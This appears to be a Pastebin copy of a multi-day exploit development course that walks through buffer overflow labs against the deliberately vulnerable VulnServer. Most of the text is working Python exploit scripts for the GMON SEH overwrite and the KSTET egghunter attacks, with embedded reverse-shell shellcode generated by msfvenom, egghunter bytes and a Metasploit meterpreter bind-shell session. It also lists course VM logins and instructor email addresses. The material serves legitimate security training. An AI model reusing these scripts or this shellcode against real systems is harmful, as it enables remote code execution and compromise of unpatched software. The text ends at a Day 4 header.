Advertisement
joemccray

New Exploit Development 2018

Nov 27th, 2017
4,896
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ############################
  2. # Exploit Development 2018 #
  3. ############################
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10. #######################
  11. # VMs for this course #
  12. #######################
  13. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
  14. username: workshop
  15. password: password
  16.  
  17. https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
  18. user: infosecaddicts
  19. pass: infosecaddicts
  20.  
  21. You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
  22.  
  23.  
  24.  
  25.  
  26.  
  27. #######################################################
  28. # Files you may find helpful for learning Exploit Dev #
  29. #######################################################
  30. https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip
  31.  
  32.  
  33.  
  34.  
  35.  
  36. #####################################
  37. # Quick Stack Based Buffer Overflow #
  38. #####################################
  39.  
  40. - You can download everything you need for this exercise (except netcat) from the link below
  41. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  42.  
  43. - Extract this zip file to your Desktop
  44.  
  45. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  46.  
  47. - Open a new command prompt and type:
  48.  
  49. ---------------------------Type This-----------------------------------
  50.  
  51. nc localhost 9999
  52. --------------------------------------------------------------------------
  53.  
  54. - In the new command prompt window where you ran nc type:
  55. HELP
  56.  
  57. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  58. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  59.  
  60. - Now double-click on 1-simplefuzzer.py
  61. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  62.  
  63.  
  64. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  65.  
  66. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  67.  
  68. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  69.  
  70. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  71.  
  72. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  73.  
  74. - Calculate the distance to EIP by running script 3-3000chars.py
  75. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  76.  
  77. 4-count-chars-to-EIP.py
  78. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  79. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  80.  
  81. 5-2006char-eip-check.py
  82. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  83.  
  84. 6-jmp-esp.py
  85. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  86.  
  87. 7-first-exploit
  88. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  89.  
  90. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  91.  
  92.  
  93. ------------------------------
  94.  
  95. ---------------------------Type This-----------------------------------
  96.  
  97.  
  98. cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc
  99.  
  100. vi vulnserv.rb (paste the code into this file)
  101.  
  102.  
  103. cd ~/toolz/metasploit
  104.  
  105. ./msfconsole
  106.  
  107.  
  108.  
  109. use exploit/windows/misc/vulnserv
  110. set PAYLOAD windows/meterpreter/bind_tcp
  111. set RHOST CHANGEME-TO-YOUR-WIN7-IP
  112. set RPORT 9999
  113. exploit
  114. -----------------------------------------------------------------------
  115.  
  116. -----------------------------------------------------------------------------------
  117. Day 1 Homework:
  118. Watch the following videos and take notes for questions tomorrow.
  119.  
  120. http://www.securitytube.net/video/1389
  121. http://www.securitytube.net/video/1398
  122. http://www.securitytube.net/video/1399
  123.  
  124.  
  125.  
  126. -----------------------------------------------------------------------------------------------------------------------
  127.  
  128. #########
  129. # Day 2 #
  130. #########
  131.  
  132. ********************************************************
  133. * Vulnserver – GMON command SEH based overflow exploit *
  134. ********************************************************
  135.  
  136. - GMON command has a vulnerability, too, however this vulnerability is SEH based. The proof of concept python script:
  137.  
  138. --------------------------Code--------------------------------
  139.  
  140. #!/usr/bin/python
  141.  
  142. import socket
  143.  
  144. characters = 'A' * 5050
  145.  
  146.  
  147.  
  148. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  149. expl.connect(('127.0.0.1', 9999))
  150. expl.recv(100)
  151. expl.send('GMON /.:/' + characters)
  152. expl.close()
  153.  
  154. --------------------------------------------------------------
  155.  
  156. 1. Identify the position of EIP. When the application crashes, select View/SEH chain.
  157.  
  158. 2. As it can be seen, the SE handler is overwritten with A characters. Create a pattern with the Metasploit tool, update the script and send the buffer to the application.
  159.  
  160. 3. Calculate offset (From here the offset is 3519)
  161.  
  162. 4. Update python script:
  163.  
  164. --------------------------Code--------------------------------
  165.  
  166. #!/usr/bin/python
  167.  
  168. import socket
  169. import os
  170. import sys
  171.  
  172.  
  173. buffer = 'GMON /.:/' + 'A' * 3519 + '\x42\x42\x42\x42' + 'C' * (5050 - 3519 - 4)
  174.  
  175. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  176. expl.connect(('127.0.0.1', 9999))
  177. expl.recv(100)
  178. expl.send(buffer)
  179. expl.close()
  180.  
  181. --------------------------------------------------------------
  182.  
  183. 5. Crash the application with the updated script. The offset seems to correct.
  184.  
  185. 6. Check bad characters - Update Python script to check bad characters:
  186.  
  187. --------------------------Code--------------------------------
  188.  
  189. #!/usr/bin/python
  190.  
  191. import socket
  192. import os
  193. import sys
  194.  
  195.  
  196.  
  197. chars=(
  198. "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  199. "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  200. "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  201. "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  202. "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  203. "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  204. "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  205. "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  206. "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  207. "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  208. "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  209. "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  210. "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  211. "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  212. "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  213. "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
  214.  
  215. buffer = 'GMON /.:/' + 'A' * (3519 - len(chars)) + chars + '\x42\x42\x42\x42' + 'C' * (5050 - 3519 - 4)
  216.  
  217. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  218. expl.connect(('127.0.0.1', 9999))
  219. expl.recv(100)
  220. expl.send(buffer)
  221. expl.close()
  222.  
  223. --------------------------------------------------------------
  224.  
  225. - I placed the characters after the four B, but it did not trigger SEH based overflow. Then I placed them before the four B. The characters looks good. The only bad character is the zero.
  226.  
  227. 7. Find address for EIP:
  228.  
  229. - In case of SEH based overflow, we have two important things to remember. The first one is that there are some protection against SEH and not all module is appropriate. There is an OllyDbg plugin which lists modules whether it contains SEH protection or not. The plugin can be downloaded from here: http://www.openrce.org/downloads/details/244/OllySSEH
  230. - The DLL should be copied next to the OllyDbg exe. Then a new submenu will appear in the plugin menu. (SafeSEH OFF)
  231.  
  232. - There are two modules which were not compiled with SEH protection. The address of vulnserver.exe contains zero character, so that it is not appropriate for us. The other module is essfunc.dll and it might be good.
  233.  
  234. - In case of buffer overflow, we have to find a JMP os CALL instruction. In case of SEH overflow, we have to find a sequence of instructions, POP-POP-RET. The structure of the SEH contains three values on the stack. The first and second POP removes the first two values. The third instruction is the RET. As the third value is the EIP, the RET instruction will move it into EIP.
  235.  
  236. - In order to find a sequence of values in OllyDbg, open the essfunc.dll module, right click on the code and select Search for/All sequences. In the dialog box, type the following:
  237.  
  238. POP r32
  239. POP r32
  240. RETN
  241.  
  242. - Select one of the addresses and double click on it. Copy the selected into the script.
  243.  
  244.  
  245. --------------------------Code--------------------------------
  246.  
  247. #!/usr/bin/python
  248.  
  249. import socket
  250. import os
  251. import sys
  252.  
  253. # 625011B3 POP-POP-RET from essfunc.dll
  254.  
  255. buffer = 'GMON /.:/' + 'A' * 3519 + '\xb3\x11\x50\x62' + 'C' * (5050 - 3519 - 4)
  256.  
  257. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  258. expl.connect(('127.0.0.1', 9999))
  259. expl.recv(100)
  260. expl.send(buffer)
  261. expl.close()
  262.  
  263. --------------------------------------------------------------
  264.  
  265. 8. First stage payload
  266.  
  267.  
  268. - Let us crash the application with this updated script and see, what the SE handler isl.
  269.  
  270. # 625011B3 POP-POP-RET from essfunc.dll
  271.  
  272. - Place a breakpoint on the address (Select it and press F2) and press Shift + F9. Then go through the POP-POP-RET instructions (press F7 three times). We stop 4 bytes before the EIP address.
  273.  
  274. - Four bytes is not too much. We can jump here to somewhere else. A short jump is only two bytes. Let us jump after the EIP. Jump to the point where the buffer, which contains the 0x43 bytes, starts. The other two bytes can be filled with NOPs.
  275.  
  276. # 017BFFC4 EB 06 JMP SHORT 017BFFCC
  277.  
  278. - This JMP instruction can be considered as the first stage payload.
  279.  
  280.  
  281. 9. Second stage payload
  282.  
  283. - After we execute the JMP instructions, we have just a few bytes to execute (from 0174FFCB to 0174FFFF, this is only 34 bytes). There are lot of space in the As buffer, before the EIP address. We can place the reverse shell payload there and jump there from here somehow. The reverse shell can be considered as a third stage payload, and the code, which jumps to it, is the second stage payload.
  284.  
  285. - One possible solution is to get the EIP with a trick, subtract some value from it and jump to that address. The assembly code of this trick:
  286.  
  287. second_stage.asm
  288.  
  289. ------------------------------------------------
  290. global _start
  291.  
  292. _start:
  293.  
  294. fldz
  295. fnstenv [esp-12]
  296. pop ecx
  297. add cl, 10
  298. nop
  299.  
  300. dec ch ; ecx=-256;
  301. dec ch ; ecx=-256;
  302. jmp ecx ; lets jmp ecx (current location - 512)
  303.  
  304. -------------------------------------------------
  305.  
  306. - Let us place this code in the Cs buffer and the reverse shell payload into the As buffer. The reverse shell payload should be placed next to the EIP address and the characters should be NOP instructions.
  307.  
  308. - The structure of the buffer:
  309.  
  310. NOP instructions | Reverse Shell payload | Short JMP | NOP | NOP | EIP | Second Stage payload
  311.  
  312. # shellcode: ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.243.166 LPORT=4449 -b "\x00" -f c EXITFUNC=thread
  313.  
  314. - The first version of exploit:
  315.  
  316. --------------------------Code--------------------------------
  317.  
  318. import socket
  319. import os
  320. import sys
  321.  
  322. buf = ("\xbb\xd4\x42\x7c\xae\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
  323. "\x52\x83\xea\xfc\x31\x5a\x0e\x03\x8e\x4c\x9e\x5b\xd2\xb9\xdc"
  324. "\xa4\x2a\x3a\x81\x2d\xcf\x0b\x81\x4a\x84\x3c\x31\x18\xc8\xb0"
  325. "\xba\x4c\xf8\x43\xce\x58\x0f\xe3\x65\xbf\x3e\xf4\xd6\x83\x21"
  326. "\x76\x25\xd0\x81\x47\xe6\x25\xc0\x80\x1b\xc7\x90\x59\x57\x7a"
  327. "\x04\xed\x2d\x47\xaf\xbd\xa0\xcf\x4c\x75\xc2\xfe\xc3\x0d\x9d"
  328. "\x20\xe2\xc2\x95\x68\xfc\x07\x93\x23\x77\xf3\x6f\xb2\x51\xcd"
  329. "\x90\x19\x9c\xe1\x62\x63\xd9\xc6\x9c\x16\x13\x35\x20\x21\xe0"
  330. "\x47\xfe\xa4\xf2\xe0\x75\x1e\xde\x11\x59\xf9\x95\x1e\x16\x8d"
  331. "\xf1\x02\xa9\x42\x8a\x3f\x22\x65\x5c\xb6\x70\x42\x78\x92\x23"
  332. "\xeb\xd9\x7e\x85\x14\x39\x21\x7a\xb1\x32\xcc\x6f\xc8\x19\x99"
  333. "\x5c\xe1\xa1\x59\xcb\x72\xd2\x6b\x54\x29\x7c\xc0\x1d\xf7\x7b"
  334. "\x27\x34\x4f\x13\xd6\xb7\xb0\x3a\x1d\xe3\xe0\x54\xb4\x8c\x6a"
  335. "\xa4\x39\x59\x3c\xf4\x95\x32\xfd\xa4\x55\xe3\x95\xae\x59\xdc"
  336. "\x86\xd1\xb3\x75\x2c\x28\x54\xba\x19\xc1\x02\x52\x58\x25\x5a"
  337. "\xc2\xd5\xc3\x36\x14\xb0\x5c\xaf\x8d\x99\x16\x4e\x51\x34\x53"
  338. "\x50\xd9\xbb\xa4\x1f\x2a\xb1\xb6\xc8\xda\x8c\xe4\x5f\xe4\x3a"
  339. "\x80\x3c\x77\xa1\x50\x4a\x64\x7e\x07\x1b\x5a\x77\xcd\xb1\xc5"
  340. "\x21\xf3\x4b\x93\x0a\xb7\x97\x60\x94\x36\x55\xdc\xb2\x28\xa3"
  341. "\xdd\xfe\x1c\x7b\x88\xa8\xca\x3d\x62\x1b\xa4\x97\xd9\xf5\x20"
  342. "\x61\x12\xc6\x36\x6e\x7f\xb0\xd6\xdf\xd6\x85\xe9\xd0\xbe\x01"
  343. "\x92\x0c\x5f\xed\x49\x95\x7f\x0c\x5b\xe0\x17\x89\x0e\x49\x7a"
  344. "\x2a\xe5\x8e\x83\xa9\x0f\x6f\x70\xb1\x7a\x6a\x3c\x75\x97\x06"
  345. "\x2d\x10\x97\xb5\x4e\x31")
  346.  
  347. # 625011B3 POP-POP-RET from essfunc.dll
  348.  
  349. # 017BFFC4 EB 06 JMP SHORT 017BFFCC
  350.  
  351. first_stage = "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"
  352.  
  353. buffer = "GMON /.:/" + "\x90" * (3515 - len(buf)) + buf + "\xeb\x06\x90\x90" + "\xb3\x11\x50\x62" + first_stage + "C" * (5050 - 3519 - 4 - len(first_stage))
  354.  
  355. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  356. expl.connect(('127.0.0.1', 9999))
  357. expl.recv(100)
  358. expl.send(buffer)
  359. expl.close()
  360.  
  361. -------------------------------------------------------------
  362.  
  363. - The other possible solution is if we use an egghunter. The egghunter is a small code which searches the Virtual Address Space for a certain pattern and if it finds the pattern, then it starts to execute the code after the pattern. The pattern is four byte long. In order to avoid finding the pattern in the egghunter, the four byte should be repeated twice.
  364.  
  365. - The structure of the buffer:
  366.  
  367. NOP instructions | EGG | EGG | Reverse Shell payload | Short JMP | NOP | NOP | EIP | Egghunter
  368.  
  369. # shellcode: ./msfvenom -p windows/shell_reverse_tcp LHOST=192.168.243.166 LPORT=4449 -b "\x00" -f c EXITFUNC=thread
  370.  
  371. - The second version of exploit:
  372.  
  373. --------------------------Code--------------------------------
  374.  
  375. #!/usr/bin/python
  376.  
  377. import socket
  378. import os
  379. import sys
  380.  
  381.  
  382. buf = ("\xbb\xd4\x42\x7c\xae\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
  383. "\x52\x83\xea\xfc\x31\x5a\x0e\x03\x8e\x4c\x9e\x5b\xd2\xb9\xdc"
  384. "\xa4\x2a\x3a\x81\x2d\xcf\x0b\x81\x4a\x84\x3c\x31\x18\xc8\xb0"
  385. "\xba\x4c\xf8\x43\xce\x58\x0f\xe3\x65\xbf\x3e\xf4\xd6\x83\x21"
  386. "\x76\x25\xd0\x81\x47\xe6\x25\xc0\x80\x1b\xc7\x90\x59\x57\x7a"
  387. "\x04\xed\x2d\x47\xaf\xbd\xa0\xcf\x4c\x75\xc2\xfe\xc3\x0d\x9d"
  388. "\x20\xe2\xc2\x95\x68\xfc\x07\x93\x23\x77\xf3\x6f\xb2\x51\xcd"
  389. "\x90\x19\x9c\xe1\x62\x63\xd9\xc6\x9c\x16\x13\x35\x20\x21\xe0"
  390. "\x47\xfe\xa4\xf2\xe0\x75\x1e\xde\x11\x59\xf9\x95\x1e\x16\x8d"
  391. "\xf1\x02\xa9\x42\x8a\x3f\x22\x65\x5c\xb6\x70\x42\x78\x92\x23"
  392. "\xeb\xd9\x7e\x85\x14\x39\x21\x7a\xb1\x32\xcc\x6f\xc8\x19\x99"
  393. "\x5c\xe1\xa1\x59\xcb\x72\xd2\x6b\x54\x29\x7c\xc0\x1d\xf7\x7b"
  394. "\x27\x34\x4f\x13\xd6\xb7\xb0\x3a\x1d\xe3\xe0\x54\xb4\x8c\x6a"
  395. "\xa4\x39\x59\x3c\xf4\x95\x32\xfd\xa4\x55\xe3\x95\xae\x59\xdc"
  396. "\x86\xd1\xb3\x75\x2c\x28\x54\xba\x19\xc1\x02\x52\x58\x25\x5a"
  397. "\xc2\xd5\xc3\x36\x14\xb0\x5c\xaf\x8d\x99\x16\x4e\x51\x34\x53"
  398. "\x50\xd9\xbb\xa4\x1f\x2a\xb1\xb6\xc8\xda\x8c\xe4\x5f\xe4\x3a"
  399. "\x80\x3c\x77\xa1\x50\x4a\x64\x7e\x07\x1b\x5a\x77\xcd\xb1\xc5"
  400. "\x21\xf3\x4b\x93\x0a\xb7\x97\x60\x94\x36\x55\xdc\xb2\x28\xa3"
  401. "\xdd\xfe\x1c\x7b\x88\xa8\xca\x3d\x62\x1b\xa4\x97\xd9\xf5\x20"
  402. "\x61\x12\xc6\x36\x6e\x7f\xb0\xd6\xdf\xd6\x85\xe9\xd0\xbe\x01"
  403. "\x92\x0c\x5f\xed\x49\x95\x7f\x0c\x5b\xe0\x17\x89\x0e\x49\x7a"
  404. "\x2a\xe5\x8e\x83\xa9\x0f\x6f\x70\xb1\x7a\x6a\x3c\x75\x97\x06"
  405. "\x2d\x10\x97\xb5\x4e\x31")
  406.  
  407. # 625011B3 POP-POP-RET from essfunc.dll
  408.  
  409. # 017BFFC4 EB 06 JMP SHORT 017BFFCC
  410.  
  411. first_stage = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  412.  
  413. egg = "\x54\x30\x30\x57" # 0x57303054
  414.  
  415. buffer = "GMON /.:/" + "\x90" * (3515 - 4 - 4 - len(buf)) + egg + egg + buf + "\xeb\x06\x90\x90" + "\xb3\x11\x50\x62" + first_stage + "C" * (5050 - 3519 - 4 - len(first_stage))
  416.  
  417. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  418. expl.connect(('127.0.0.1', 9999))
  419. expl.recv(100)
  420. expl.send(buffer)
  421. expl.close()
  422.  
  423. ---------------------------------------------------------------
  424.  
  425.  
  426.  
  427. Today, let's work on the Konica Minolta SEH overwrite. You can look at the public exploit code, and download the target vulnerable application from here:
  428. https://www.exploit-db.com/exploits/39215/
  429.  
  430. You can download the attack scripts from today from here:
  431. https://s3.amazonaws.com/infosecaddictsfiles/2018-Exploit-Dev.zip
  432.  
  433.  
  434.  
  435. Quick challenge:
  436. Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple script format used yesterday with vulnserver. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.
  437.  
  438.  
  439.  
  440. Day 2 Homework:
  441. Watch the following videos and take notes for questions tomorrow.
  442. http://www.securitytube.net/video/1406
  443. http://www.securitytube.net/video/1407
  444. http://www.securitytube.net/video/1408
  445.  
  446.  
  447.  
  448.  
  449. -----------------------------------------------------------------------------------------------------------------------
  450.  
  451. #########
  452. # Day 3 #
  453. #########
  454.  
  455. *****************************************************
  456. * Vulnserver – KSTET command exploit with egghunter *
  457. *****************************************************
  458.  
  459. --------------------------Code--------------------------------
  460.  
  461. #!/usr/bin/python
  462.  
  463. import socket
  464. import os
  465. import sys
  466.  
  467.  
  468. buffer = "KSTET /.:/" + "A" * 5011
  469.  
  470. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  471. expl.connect(('127.0.0.1', 9999))
  472. expl.recv(100)
  473. expl.send(buffer)
  474. expl.close()
  475.  
  476. -------------------------------------------------------------
  477.  
  478. - The value of EIP is 0x41414141. It is overwritten with our As. It is a simple buffer overflow exploit.
  479.  
  480. - However only 90 A characters are in the memory.
  481.  
  482. - This place is too small for a reverse shell, but enough for an egghunter. The egghunter is a small code which searches for a unique pattern (the egg) in the memory, and if it finds the pattern, the egghunter starts to execute the code after the unique pattern.
  483.  
  484. - The exploit development steps are the same as in the previous cases:
  485.  
  486. 1. We have to find the offset from where the EIP is overwritten.
  487. 2. Then we have to find an address. In our case JMP ESP is a good candidate as the ESP points into the middle of the As buffer.
  488. 3. We have 20 byte to jump to the beginning of the As buffer.
  489. 4. The egghunter should be placed right after the ‘KSTET /.:/’.
  490. 5. The reverse shell should be placed somehow into the memory with the egg.
  491.  
  492. --------------------------Code--------------------------------
  493.  
  494. #!/usr/bin/python
  495.  
  496. import socket
  497. import os
  498. import sys
  499.  
  500.  
  501. # 62501205 from essfunc.dll JMP ESP
  502.  
  503. buffer = "KSTET /.:/" + "A" * 66 + "\x05\x12\x50\x62" + "C" * (5011 - 66 - 4)
  504.  
  505. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  506. expl.connect(('127.0.0.1', 9999))
  507. expl.recv(100)
  508. expl.send(buffer)
  509. expl.close()
  510.  
  511. --------------------------------------------------------------
  512.  
  513. 1. Jump backward
  514. - We have 20 bytes to jump backward. (The 0x43 part of the memory.)
  515.  
  516. - The hex code of JMP SHORT instruction is 0xeb. The second byte tells us, how many bytes to jump. If this byte is lower than 0x80, it jumps forward. If the value is greater than or equal with 0x80, it jumps backward. Obviously it can jump no more than 127 byte.
  517.  
  518. - We do not need to know the code if we use OllyDbg. Simply double click on the 0178f9e0 line and write in the box JMP SHORT and the address of the position where it should jump.
  519.  
  520. - Great! The two hex codes are 0xeb and 0xb8. Update the script with them and also add the egghunter code to it.
  521.  
  522. - The updated code:
  523.  
  524. --------------------------Code--------------------------------
  525.  
  526. #!/usr/bin/python
  527.  
  528. import socket
  529. import os
  530. import sys
  531.  
  532.  
  533.  
  534. egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
  535.  
  536.  
  537. # 62501205 from essfunc.dll JMP ESP
  538.  
  539. # eb b8 jmp short
  540.  
  541. buffer = "KSTET /.:/" + egghunter + "\xCC" * (66 - len(egghunter)) + "\x05\x12\x50\x62" + "\xeb\xb8" + "C" * (5011 - 66 - 4 - 2)
  542.  
  543. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  544. expl.connect(('127.0.0.1', 9999))
  545. expl.recv(100)
  546. expl.send(buffer)
  547. expl.close()
  548.  
  549. -------------------------------------------------------------
  550.  
  551.  
  552. 2. Place shellcode with egghunter into the memory
  553.  
  554. - We have a few command we can send to VulnServer. One of them might be good for our purpose and keeps the shellcode in memory. We update our code, so that it sends a command with a parameter, where the parameter is our shellcode with the egg. Then we send the KSTET command with our crafted buffer. When the buffer overflow is triggered, we search the memory for the egg. If we find it, then the command is good. This is a trial and error process.
  555.  
  556. - GDOG command keeps the passed parameter in the memory. The updated shellcode:
  557.  
  558. --------------------------Code--------------------------------
  559.  
  560. #!/usr/bin/python
  561.  
  562. import socket
  563. import os
  564. import sys
  565.  
  566.  
  567.  
  568.  
  569. shellcode = ""
  570. shellcode += "\xdb\xd1\xd9\x74\x24\xf4\x5a\x2b\xc9\xbd\x0e\x55\xbd"
  571. shellcode += "\x38\xb1\x52\x31\x6a\x17\x83\xc2\x04\x03\x64\x46\x5f"
  572. shellcode += "\xcd\x84\x80\x1d\x2e\x74\x51\x42\xa6\x91\x60\x42\xdc"
  573. shellcode += "\xd2\xd3\x72\x96\xb6\xdf\xf9\xfa\x22\x6b\x8f\xd2\x45"
  574. shellcode += "\xdc\x3a\x05\x68\xdd\x17\x75\xeb\x5d\x6a\xaa\xcb\x5c"
  575. shellcode += "\xa5\xbf\x0a\x98\xd8\x32\x5e\x71\x96\xe1\x4e\xf6\xe2"
  576. shellcode += "\x39\xe5\x44\xe2\x39\x1a\x1c\x05\x6b\x8d\x16\x5c\xab"
  577. shellcode += "\x2c\xfa\xd4\xe2\x36\x1f\xd0\xbd\xcd\xeb\xae\x3f\x07"
  578. shellcode += "\x22\x4e\x93\x66\x8a\xbd\xed\xaf\x2d\x5e\x98\xd9\x4d"
  579. shellcode += "\xe3\x9b\x1e\x2f\x3f\x29\x84\x97\xb4\x89\x60\x29\x18"
  580. shellcode += "\x4f\xe3\x25\xd5\x1b\xab\x29\xe8\xc8\xc0\x56\x61\xef"
  581. shellcode += "\x06\xdf\x31\xd4\x82\xbb\xe2\x75\x93\x61\x44\x89\xc3"
  582. shellcode += "\xc9\x39\x2f\x88\xe4\x2e\x42\xd3\x60\x82\x6f\xeb\x70"
  583. shellcode += "\x8c\xf8\x98\x42\x13\x53\x36\xef\xdc\x7d\xc1\x10\xf7"
  584. shellcode += "\x3a\x5d\xef\xf8\x3a\x74\x34\xac\x6a\xee\x9d\xcd\xe0"
  585. shellcode += "\xee\x22\x18\xa6\xbe\x8c\xf3\x07\x6e\x6d\xa4\xef\x64"
  586. shellcode += "\x62\x9b\x10\x87\xa8\xb4\xbb\x72\x3b\x7b\x93\x7e\x39"
  587. shellcode += "\x13\xe6\x7e\x2c\xb8\x6f\x98\x24\x50\x26\x33\xd1\xc9"
  588. shellcode += "\x63\xcf\x40\x15\xbe\xaa\x43\x9d\x4d\x4b\x0d\x56\x3b"
  589. shellcode += "\x5f\xfa\x96\x76\x3d\xad\xa9\xac\x29\x31\x3b\x2b\xa9"
  590. shellcode += "\x3c\x20\xe4\xfe\x69\x96\xfd\x6a\x84\x81\x57\x88\x55"
  591. shellcode += "\x57\x9f\x08\x82\xa4\x1e\x91\x47\x90\x04\x81\x91\x19"
  592. shellcode += "\x01\xf5\x4d\x4c\xdf\xa3\x2b\x26\x91\x1d\xe2\x95\x7b"
  593. shellcode += "\xc9\x73\xd6\xbb\x8f\x7b\x33\x4a\x6f\xcd\xea\x0b\x90"
  594. shellcode += "\xe2\x7a\x9c\xe9\x1e\x1b\x63\x20\x9b\x2b\x2e\x68\x8a"
  595. shellcode += "\xa3\xf7\xf9\x8e\xa9\x07\xd4\xcd\xd7\x8b\xdc\xad\x23"
  596. shellcode += "\x93\x95\xa8\x68\x13\x46\xc1\xe1\xf6\x68\x76\x01\xd3"
  597.  
  598. egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
  599.  
  600. egg = "\x54\x30\x30\x57" # 0x57303054
  601.  
  602.  
  603. # 62501205 from essfunc.dll JMP ESP
  604.  
  605. # eb b8 jmp short
  606.  
  607. buffer = "KSTET /.:/" + egghunter + "\xCC" * (66 - len(egghunter)) + "\x05\x12\x50\x62" + "\xeb\xb8" + "C" * (5011 - 66 - 4 - 2)
  608.  
  609. expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  610. expl.connect(('127.0.0.1', 9999))
  611. expl.recv(100)
  612.  
  613. expl.send("GDOG " + egg + egg + shellcode)
  614. expl.recv(1024)
  615.  
  616. expl.send(buffer)
  617. expl.close()
  618.  
  619. --------------------------------------------------------------
  620.  
  621.  
  622. - The memory can be searched in OllyDbg for a pattern. The memory where the our egg code resides
  623.  
  624.  
  625.  
  626.  
  627. You can download the attack scripts from today from here:
  628.  
  629.  
  630. Quick challenge:
  631. Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple script format used with vulnserver and SLMail on your Windows 7 host machine. Email both the scripts and a word document with screenshots detailing how you took the script from exploit-db.com and converted it to the multiple script format on Windows 7. Send both the scripts and the word document to Kofo and Ivana (kofogt@infosecaddicts.com, and ivana@strategicsec.com) in order to receive your CPEs from this class.
  632.  
  633.  
  634.  
  635.  
  636.  
  637. #########
  638. # Day 4 #
  639. #########
  640.  
  641. *****************************************************
